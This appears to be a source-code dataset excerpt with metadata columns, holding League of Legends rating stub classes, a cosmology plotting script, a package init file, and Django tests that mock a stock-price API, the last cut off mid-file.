| 0
| 0
| 1
| 0.033835
| false
| 0
| 0.006266
| 0
| 0.073935
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f5fc8d5f7e3c1dff56b0bfea428d6fdd6714d632
| 6,545
|
py
|
Python
|
loldib/getratings/models/NA/na_reksai/na_reksai_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_reksai/na_reksai_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_reksai/na_reksai_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
# Auto-generated placeholder rating models: one empty subclass of
# `Ratings` per opposing champion, for Rek'Sai played bot lane in the NA
# region. The class name encodes region_champion_lane_opponent; all
# behavior lives in the shared `Ratings` base class (imported above).
class NA_RekSai_Bot_Aatrox(Ratings):
    pass
class NA_RekSai_Bot_Ahri(Ratings):
    pass
class NA_RekSai_Bot_Akali(Ratings):
    pass
class NA_RekSai_Bot_Alistar(Ratings):
    pass
class NA_RekSai_Bot_Amumu(Ratings):
    pass
class NA_RekSai_Bot_Anivia(Ratings):
    pass
class NA_RekSai_Bot_Annie(Ratings):
    pass
class NA_RekSai_Bot_Ashe(Ratings):
    pass
class NA_RekSai_Bot_AurelionSol(Ratings):
    pass
class NA_RekSai_Bot_Azir(Ratings):
    pass
class NA_RekSai_Bot_Bard(Ratings):
    pass
class NA_RekSai_Bot_Blitzcrank(Ratings):
    pass
class NA_RekSai_Bot_Brand(Ratings):
    pass
class NA_RekSai_Bot_Braum(Ratings):
    pass
class NA_RekSai_Bot_Caitlyn(Ratings):
    pass
class NA_RekSai_Bot_Camille(Ratings):
    pass
class NA_RekSai_Bot_Cassiopeia(Ratings):
    pass
class NA_RekSai_Bot_Chogath(Ratings):
    pass
class NA_RekSai_Bot_Corki(Ratings):
    pass
class NA_RekSai_Bot_Darius(Ratings):
    pass
class NA_RekSai_Bot_Diana(Ratings):
    pass
class NA_RekSai_Bot_Draven(Ratings):
    pass
class NA_RekSai_Bot_DrMundo(Ratings):
    pass
class NA_RekSai_Bot_Ekko(Ratings):
    pass
class NA_RekSai_Bot_Elise(Ratings):
    pass
class NA_RekSai_Bot_Evelynn(Ratings):
    pass
class NA_RekSai_Bot_Ezreal(Ratings):
    pass
class NA_RekSai_Bot_Fiddlesticks(Ratings):
    pass
class NA_RekSai_Bot_Fiora(Ratings):
    pass
class NA_RekSai_Bot_Fizz(Ratings):
    pass
class NA_RekSai_Bot_Galio(Ratings):
    pass
class NA_RekSai_Bot_Gangplank(Ratings):
    pass
class NA_RekSai_Bot_Garen(Ratings):
    pass
class NA_RekSai_Bot_Gnar(Ratings):
    pass
class NA_RekSai_Bot_Gragas(Ratings):
    pass
class NA_RekSai_Bot_Graves(Ratings):
    pass
class NA_RekSai_Bot_Hecarim(Ratings):
    pass
class NA_RekSai_Bot_Heimerdinger(Ratings):
    pass
class NA_RekSai_Bot_Illaoi(Ratings):
    pass
class NA_RekSai_Bot_Irelia(Ratings):
    pass
class NA_RekSai_Bot_Ivern(Ratings):
    pass
class NA_RekSai_Bot_Janna(Ratings):
    pass
class NA_RekSai_Bot_JarvanIV(Ratings):
    pass
class NA_RekSai_Bot_Jax(Ratings):
    pass
class NA_RekSai_Bot_Jayce(Ratings):
    pass
class NA_RekSai_Bot_Jhin(Ratings):
    pass
class NA_RekSai_Bot_Jinx(Ratings):
    pass
class NA_RekSai_Bot_Kalista(Ratings):
    pass
class NA_RekSai_Bot_Karma(Ratings):
    pass
class NA_RekSai_Bot_Karthus(Ratings):
    pass
class NA_RekSai_Bot_Kassadin(Ratings):
    pass
class NA_RekSai_Bot_Katarina(Ratings):
    pass
class NA_RekSai_Bot_Kayle(Ratings):
    pass
class NA_RekSai_Bot_Kayn(Ratings):
    pass
class NA_RekSai_Bot_Kennen(Ratings):
    pass
class NA_RekSai_Bot_Khazix(Ratings):
    pass
class NA_RekSai_Bot_Kindred(Ratings):
    pass
class NA_RekSai_Bot_Kled(Ratings):
    pass
class NA_RekSai_Bot_KogMaw(Ratings):
    pass
class NA_RekSai_Bot_Leblanc(Ratings):
    pass
class NA_RekSai_Bot_LeeSin(Ratings):
    pass
class NA_RekSai_Bot_Leona(Ratings):
    pass
class NA_RekSai_Bot_Lissandra(Ratings):
    pass
class NA_RekSai_Bot_Lucian(Ratings):
    pass
class NA_RekSai_Bot_Lulu(Ratings):
    pass
class NA_RekSai_Bot_Lux(Ratings):
    pass
class NA_RekSai_Bot_Malphite(Ratings):
    pass
class NA_RekSai_Bot_Malzahar(Ratings):
    pass
class NA_RekSai_Bot_Maokai(Ratings):
    pass
class NA_RekSai_Bot_MasterYi(Ratings):
    pass
class NA_RekSai_Bot_MissFortune(Ratings):
    pass
class NA_RekSai_Bot_MonkeyKing(Ratings):
    pass
class NA_RekSai_Bot_Mordekaiser(Ratings):
    pass
class NA_RekSai_Bot_Morgana(Ratings):
    pass
class NA_RekSai_Bot_Nami(Ratings):
    pass
class NA_RekSai_Bot_Nasus(Ratings):
    pass
class NA_RekSai_Bot_Nautilus(Ratings):
    pass
class NA_RekSai_Bot_Nidalee(Ratings):
    pass
class NA_RekSai_Bot_Nocturne(Ratings):
    pass
class NA_RekSai_Bot_Nunu(Ratings):
    pass
class NA_RekSai_Bot_Olaf(Ratings):
    pass
class NA_RekSai_Bot_Orianna(Ratings):
    pass
class NA_RekSai_Bot_Ornn(Ratings):
    pass
class NA_RekSai_Bot_Pantheon(Ratings):
    pass
class NA_RekSai_Bot_Poppy(Ratings):
    pass
class NA_RekSai_Bot_Quinn(Ratings):
    pass
class NA_RekSai_Bot_Rakan(Ratings):
    pass
class NA_RekSai_Bot_Rammus(Ratings):
    pass
class NA_RekSai_Bot_RekSai(Ratings):
    pass
class NA_RekSai_Bot_Renekton(Ratings):
    pass
class NA_RekSai_Bot_Rengar(Ratings):
    pass
class NA_RekSai_Bot_Riven(Ratings):
    pass
class NA_RekSai_Bot_Rumble(Ratings):
    pass
class NA_RekSai_Bot_Ryze(Ratings):
    pass
class NA_RekSai_Bot_Sejuani(Ratings):
    pass
class NA_RekSai_Bot_Shaco(Ratings):
    pass
class NA_RekSai_Bot_Shen(Ratings):
    pass
class NA_RekSai_Bot_Shyvana(Ratings):
    pass
class NA_RekSai_Bot_Singed(Ratings):
    pass
class NA_RekSai_Bot_Sion(Ratings):
    pass
class NA_RekSai_Bot_Sivir(Ratings):
    pass
class NA_RekSai_Bot_Skarner(Ratings):
    pass
class NA_RekSai_Bot_Sona(Ratings):
    pass
class NA_RekSai_Bot_Soraka(Ratings):
    pass
class NA_RekSai_Bot_Swain(Ratings):
    pass
class NA_RekSai_Bot_Syndra(Ratings):
    pass
class NA_RekSai_Bot_TahmKench(Ratings):
    pass
class NA_RekSai_Bot_Taliyah(Ratings):
    pass
class NA_RekSai_Bot_Talon(Ratings):
    pass
class NA_RekSai_Bot_Taric(Ratings):
    pass
class NA_RekSai_Bot_Teemo(Ratings):
    pass
class NA_RekSai_Bot_Thresh(Ratings):
    pass
class NA_RekSai_Bot_Tristana(Ratings):
    pass
class NA_RekSai_Bot_Trundle(Ratings):
    pass
class NA_RekSai_Bot_Tryndamere(Ratings):
    pass
class NA_RekSai_Bot_TwistedFate(Ratings):
    pass
class NA_RekSai_Bot_Twitch(Ratings):
    pass
class NA_RekSai_Bot_Udyr(Ratings):
    pass
class NA_RekSai_Bot_Urgot(Ratings):
    pass
class NA_RekSai_Bot_Varus(Ratings):
    pass
class NA_RekSai_Bot_Vayne(Ratings):
    pass
class NA_RekSai_Bot_Veigar(Ratings):
    pass
class NA_RekSai_Bot_Velkoz(Ratings):
    pass
class NA_RekSai_Bot_Vi(Ratings):
    pass
class NA_RekSai_Bot_Viktor(Ratings):
    pass
class NA_RekSai_Bot_Vladimir(Ratings):
    pass
class NA_RekSai_Bot_Volibear(Ratings):
    pass
class NA_RekSai_Bot_Warwick(Ratings):
    pass
class NA_RekSai_Bot_Xayah(Ratings):
    pass
class NA_RekSai_Bot_Xerath(Ratings):
    pass
class NA_RekSai_Bot_XinZhao(Ratings):
    pass
class NA_RekSai_Bot_Yasuo(Ratings):
    pass
class NA_RekSai_Bot_Yorick(Ratings):
    pass
class NA_RekSai_Bot_Zac(Ratings):
    pass
class NA_RekSai_Bot_Zed(Ratings):
    pass
class NA_RekSai_Bot_Ziggs(Ratings):
    pass
class NA_RekSai_Bot_Zilean(Ratings):
    pass
class NA_RekSai_Bot_Zyra(Ratings):
    pass
| 15.695444
| 46
| 0.766692
| 972
| 6,545
| 4.736626
| 0.151235
| 0.209818
| 0.389661
| 0.479583
| 0.803432
| 0.803432
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169748
| 6,545
| 416
| 47
| 15.733173
| 0.847258
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
de2cb22c06be951b4fdc7384a94a639d5b1f883c
| 10,847
|
py
|
Python
|
struct/model/boss/2pcf_pk_test/plot_test.py
|
naonori/hitomi
|
02b188eb8ada4d39a10801bf3193581b9bc9c310
|
[
"MIT"
] | 6
|
2021-09-28T04:00:56.000Z
|
2022-03-23T03:49:19.000Z
|
struct/model/boss/2pcf_pk_test/plot_test.py
|
naonori/hitomi
|
02b188eb8ada4d39a10801bf3193581b9bc9c310
|
[
"MIT"
] | null | null | null |
struct/model/boss/2pcf_pk_test/plot_test.py
|
naonori/hitomi
|
02b188eb8ada4d39a10801bf3193581b9bc9c310
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
########################
# Purpose of this code #
########################
#
# This code aims to plot the computed power spectra and 2PCFs
# (two-point correlation functions).
#
######################################################
import sys, os
import numpy as np
import matplotlib.pyplot as plt
# Matplotlib defaults applied to every figure produced by this script.
params = {
    # 'font.family': 'Times New Roman',
    # 'text.usetex': 'True',
    'font.size': 11.0,
}
plt.rcParams.update(params)
#fig = plt.figure(figsize=(210.0/25.4, 264.0/25.4/2.3))
#fig = plt.figure(figsize=(1.8*210.0/25.4, 1.8*210.0/25.4/3.0))
fig = plt.figure(figsize=(7.0,7.0))
ax = []
##--------------------------
# Single-panel axes layout in figure-relative (0-1) coordinates: the
# panel spans from (left, bottom) up to the usable canvas extent minus
# the right/top gaps dw/dh.
total_h = 0.94  # usable canvas height (fraction of figure)
total_w = 0.99  # usable canvas width (fraction of figure)
dw = 0.07       # gap reserved on the right
dh = 0.00       # gap reserved on the top
left = 0.13     # left margin
bottom = 0.11   # bottom margin
height = (total_h - (bottom + dh))
width = (total_w - (left + dw))
#left bottom, width, height
rect1 = [left, bottom, width, height]
ax.append(fig.add_axes(rect1))
### ##########
### ## Linear power spectra
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### k, pk = np.loadtxt("results_test/pk%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="royalblue", label="pk%d" % ELL)
### ax[0].set_xlim(0.01, 0.2)
### ax[0].set_xlabel("k [h/Mpc]")
### ax[0].set_ylabel(r"$k^{1.5}$ power spectrum(k)")
### ax[0].legend(loc=0)
### plt.savefig("figure/pk%d_Tree.png" % ELL)
### os.system("display figure/pk%d_Tree.png" % ELL)
###
### ##########
### ## Linear 2PCFs
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### r, xi = np.loadtxt("results_test/xi%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="royalblue", label="xi%d" % ELL)
### ax[0].set_xlim(40, 150)
### ax[0].set_xlabel("r [Mpc/h]")
### ax[0].set_ylabel(r"$r^2$ 2PCF(r)")
### ax[0].legend(loc=0)
### plt.savefig("figure/xi%d_Tree.png" % ELL)
### os.system("display figure/xi%d_Tree.png" % ELL)
###
###
### ##########
### ## Linear no-wiggle power spectra
### ###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### k, pk = np.loadtxt("results_test/pk%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="royalblue", label="pk%d: wiggle" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="forestgreen", label="pk%d: no-wiggle" % ELL)
### ax[0].set_xlim(0.01, 0.2)
### ax[0].set_xlabel("k [h/Mpc]")
### ax[0].set_ylabel(r"$k^{1.5}$ power spectrum(k)")
### ax[0].legend(loc=0)
### plt.savefig("figure/pk%d_Tree_NoWiggle.png" % ELL)
### os.system("display figure/pk%d_Tree_NoWiggle.png" % ELL)
###
### ##########
### ## Linear no-wiggle 2PCFs
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### r, xi = np.loadtxt("results_test/xi%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="royalblue", label="xi%d: wiggle" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="forestgreen", label="xi%d: no-wiggle" % ELL)
### ax[0].set_xlim(40, 150)
### ax[0].set_xlabel("r [Mpc/h]")
### ax[0].set_ylabel(r"$r^2$ 2PCF(r)")
### ax[0].legend(loc=0)
### plt.savefig("figure/xi%d_Tree_NoWiggle.png" % ELL)
### os.system("display figure/xi%d_Tree_NoWiggle.png" % ELL)
###
###
### ##########
### ## Linear power spectra with non-linear BAO
### ###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### k, pk = np.loadtxt("results_test/pk%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="royalblue", label="pk%d: wiggle" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="forestgreen", label="pk%d: no-wiggle" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="magenta", label="pk%d: NL BAO" % ELL)
### ax[0].set_xlim(0.01, 0.2)
### ax[0].set_xlabel("k [h/Mpc]")
### ax[0].set_ylabel(r"$k^{1.5}$ power spectrum(k)")
### ax[0].legend(loc=0)
### plt.savefig("figure/pk%d_Tree_BAO.png" % ELL)
### os.system("display figure/pk%d_Tree_BAO.png" % ELL)
###
### ##########
### ## Linear 2PCFs with non-linear BAO
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### r, xi = np.loadtxt("results_test/xi%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="royalblue", label="xi%d: wiggle" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="forestgreen", label="xi%d: no-wiggle" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="magenta", label="xi%d: NL BAO" % ELL)
### ax[0].set_xlim(40, 150)
### ax[0].set_xlabel("r [Mpc/h]")
### ax[0].set_ylabel(r"$r^2$ 2PCF(r)")
### ax[0].legend(loc=0)
### plt.savefig("figure/xi%d_Tree_BAO.png" % ELL)
### os.system("display figure/xi%d_Tree_BAO.png" % ELL)
###
###
###
###
### ##########
### ## Linear power spectra with reconstructed non-linear BAO
### ###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### k, pk = np.loadtxt("results_test/pk%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="royalblue", label="pk%d: wiggle" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="forestgreen", label="pk%d: no-wiggle" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="magenta", label="pk%d: NL BAO" % ELL)
###
### for R in [5, 10, 15, 20]:
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_recon_R%02d_fft.dat" % (ELL, R), usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", label="pk%d: R = %02d" % (ELL, R))
###
### ax[0].set_xlim(0.01, 0.2)
### ax[0].set_xlabel("k [h/Mpc]")
### ax[0].set_ylabel(r"$k^{1.5}$ power spectrum(k)")
### ax[0].legend(loc=0)
### plt.savefig("figure/pk%d_Tree_BAO_recon.png" % ELL)
### os.system("display figure/pk%d_Tree_BAO_recon.png" % ELL)
###
### ##########
### ## Linear 2PCFs with reconstructed non-linear BAO
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### r, xi = np.loadtxt("results_test/xi%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="royalblue", label="xi%d: wiggle" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="forestgreen", label="xi%d: no-wiggle" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="magenta", label="xi%d: NL BAO" % ELL)
###
### for R in [5, 10, 15, 20]:
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_recon_R%02d_fft.dat" % (ELL, R), usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", label="xi%d: R = %02d" % (ELL, R))
###
### ax[0].set_xlim(40, 150)
### ax[0].set_xlabel("r [Mpc/h]")
### ax[0].set_ylabel(r"$r^2$ 2PCF(r)")
### ax[0].legend(loc=0)
### plt.savefig("figure/xi%d_Tree_BAO_recon.png" % ELL)
### os.system("display figure/xi%d_Tree_BAO_recon.png" % ELL)
###
###
### ##########
### ## Linear power spectra with non-linear BAO, decomposed by parameters.
### ###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="magenta", label="pk%d: total" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_Template_b1_b1_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", label="pk%d: b1_b1" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_Template_b1_f_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", label="pk%d: b1_f" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_Template_f_f_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", label="pk%d: f_f" % ELL)
### ax[0].set_xlim(0.01, 0.2)
### ax[0].set_xlabel("k [h/Mpc]")
### ax[0].set_ylabel(r"$k^{1.5}$ power spectrum(k)")
### ax[0].legend(loc=0)
### plt.savefig("figure/pk%d_Tree_BAO_decon.png" % ELL)
### os.system("display figure/pk%d_Tree_BAO_decon.png" % ELL)
###
### ##########
### ## Linear 2PCFs with non-linear BAO, decomposed by parameters.
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="magenta", label="xi%d: total" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_Template_b1_b1_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", label="xi%d: b1_b1" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_Template_b1_f_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", label="xi%d: b1_f" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_Template_f_f_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", label="xi%d: f_f" % ELL)
### ax[0].set_xlim(40, 150)
### ax[0].set_xlabel("r [Mpc/h]")
### ax[0].set_ylabel(r"$r^2$ 2PCF(r)")
### ax[0].legend(loc=0)
### plt.savefig("figure/xi%d_Tree_BAO_decon.png" % ELL)
### os.system("display figure/xi%d_Tree_BAO_decon.png" % ELL)
### #
###
| 39.878676
| 119
| 0.548815
| 1,836
| 10,847
| 3.122004
| 0.071895
| 0.03559
| 0.031403
| 0.097697
| 0.925506
| 0.919749
| 0.906315
| 0.900384
| 0.888172
| 0.846127
| 0
| 0.047593
| 0.167051
| 10,847
| 271
| 120
| 40.02583
| 0.586829
| 0.85443
| 0
| 0
| 0
| 0
| 0.014085
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.157895
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
de3fda95d161613919b336bc254597d4c050044e
| 54
|
py
|
Python
|
stRT/plot/__init__.py
|
Yao-14/stAnalysis
|
d08483ce581f5b03cfcad8be500aaa64b0293f74
|
[
"BSD-3-Clause"
] | null | null | null |
stRT/plot/__init__.py
|
Yao-14/stAnalysis
|
d08483ce581f5b03cfcad8be500aaa64b0293f74
|
[
"BSD-3-Clause"
] | null | null | null |
stRT/plot/__init__.py
|
Yao-14/stAnalysis
|
d08483ce581f5b03cfcad8be500aaa64b0293f74
|
[
"BSD-3-Clause"
] | null | null | null |
from .three_d_plot import *
from .two_d_plot import *
| 18
| 27
| 0.777778
| 10
| 54
| 3.8
| 0.6
| 0.263158
| 0.578947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 54
| 2
| 28
| 27
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
de40a673cf2d9517d36be6de4ef1d9ecc1f5744c
| 30,260
|
py
|
Python
|
data_block/one/tests/test_block.py
|
spectrum-dev/django-block-monolith
|
c17a1ef98ae813a4e94581e2e52a4a03f0e65769
|
[
"MIT"
] | null | null | null |
data_block/one/tests/test_block.py
|
spectrum-dev/django-block-monolith
|
c17a1ef98ae813a4e94581e2e52a4a03f0e65769
|
[
"MIT"
] | null | null | null |
data_block/one/tests/test_block.py
|
spectrum-dev/django-block-monolith
|
c17a1ef98ae813a4e94581e2e52a4a03f0e65769
|
[
"MIT"
] | null | null | null |
import responses
from django.test import TestCase
from blocks.event import event_ingestor
from data_block.one.exceptions import (
DataBlockOneInvalidCandlestickException,
DataBlockOneInvalidInputPayloadException,
)
class GetEquityName(TestCase):
    """Tests for the /DATA_BLOCK/1/equityName ticker-search endpoint.

    Alpha Vantage's SYMBOL_SEARCH API is mocked with ``responses``, so no
    real network traffic occurs.
    """

    @responses.activate
    def test_ok(self):
        # Two matches come back from the API; the endpoint should surface
        # only the symbols, best match first.
        ticker_name = "BA"
        responses.add(
            responses.GET,
            f"https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords={ticker_name}&apikey=demo&datatype=json",
            json={
                "bestMatches": [
                    {
                        "1. symbol": "BA",
                        "2. name": "Boeing Company",
                        "3. type": "Equity",
                        "4. region": "United States",
                        "5. marketOpen": "09:30",
                        "6. marketClose": "16:00",
                        "7. timezone": "UTC-04",
                        "8. currency": "USD",
                        "9. matchScore": "1.0000",
                    },
                    {
                        "1. symbol": "BAB",
                        "2. name": "Invesco Taxable Municipal Bond ETF",
                        "3. type": "ETF",
                        "4. region": "United States",
                        "5. marketOpen": "09:30",
                        "6. marketClose": "16:00",
                        "7. timezone": "UTC-04",
                        "8. currency": "USD",
                        "9. matchScore": "0.8000",
                    },
                ],
            },
            status=200,
        )
        response = self.client.get(f"/DATA_BLOCK/1/equityName?name={ticker_name}")
        self.assertDictEqual(response.json(), {"response": ["BA", "BAB"]})

    @responses.activate
    def test_empty_input(self):
        # An empty query should short-circuit (the API is not mocked here)
        # and return no results.
        response = self.client.get("/DATA_BLOCK/1/equityName?name=")
        self.assertDictEqual(response.json(), {"response": []})

    @responses.activate
    def test_not_found(self):
        # No matches from the API -> empty response list.
        # (Plain strings below: the originals were f-strings with no
        # placeholders, flagged by lint rule F541.)
        responses.add(
            responses.GET,
            "https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=Ticker%20Name%20DNE&apikey=demo&datatype=json",
            json={
                "bestMatches": [],
            },
            status=200,
        )
        response = self.client.get("/DATA_BLOCK/1/equityName?name=Ticker Name DNE")
        self.assertDictEqual(response.json(), {"response": []})

    # TODO: It seems like there is no API limit
    def test_error_api_key_limit(self):
        pass
class PostRun(TestCase):
    """Tests for running DATA_BLOCK one through ``event_ingestor``.

    Every Alpha Vantage time-series endpoint is mocked with ``responses``.
    The block is expected to turn the API's numbered-key wire format into
    plain OHLCV dicts (floats, nanosecond-ISO timestamps), sorted
    oldest-first, restricted to [start_date, end_date].
    """

    def setUp(self):
        # Common event envelope; each test supplies its own inputs/outputs.
        self.payload = {
            "blockType": "DATA_BLOCK",
            "blockId": 1,
        }

    # ------------------------------------------------------------------
    # Helpers — the original tests repeated this boilerplate verbatim in
    # eight near-identical methods.
    # ------------------------------------------------------------------

    def _make_payload(self, equity_name, candlestick, start_date, end_date):
        """Build a complete event payload around the shared envelope."""
        return {
            **self.payload,
            "inputs": {
                "equity_name": equity_name,
                "candlestick": candlestick,
                "start_date": start_date,
                "end_date": end_date,
            },
            "outputs": {},
        }

    @staticmethod
    def _bar(open_, high, low, close, volume):
        """One OHLCV entry in Alpha Vantage's numbered-key wire format."""
        return {
            "1. open": open_,
            "2. high": high,
            "3. low": low,
            "4. close": close,
            "5. volume": volume,
        }

    @staticmethod
    def _expected_rows(bars):
        """Rows ``event_ingestor`` should return for ``bars`` (oldest first).

        ``bars`` is a list of ``(timestamp, wire_bar)`` pairs. Values are the
        exact float conversions of the wire strings, and date-only stamps
        gain a midnight time; all stamps get a nanosecond ISO suffix.
        """
        rows = []
        for stamp, bar in bars:
            date_part, _, time_part = stamp.partition(" ")
            rows.append(
                {
                    "open": float(bar["1. open"]),
                    "high": float(bar["2. high"]),
                    "low": float(bar["3. low"]),
                    "close": float(bar["4. close"]),
                    "volume": float(bar["5. volume"]),
                    "timestamp": f"{date_part}T{time_part or '00:00:00'}.000000000",
                }
            )
        return rows

    # Intraday fixture: the original tests used identical prices for every
    # interval — only the interval label and the three timestamps changed.
    _INTRADAY_PRICES = [
        ("132.4000", "132.4100", "132.4000", "132.4100", "1485"),  # oldest
        ("132.3900", "132.4100", "132.3800", "132.4100", "1212"),
        ("132.3800", "132.4500", "132.3800", "132.4500", "7165"),  # newest
    ]

    def _run_intraday_ok(self, interval, timestamps):
        """Mock TIME_SERIES_INTRADAY for ``interval`` and assert the result.

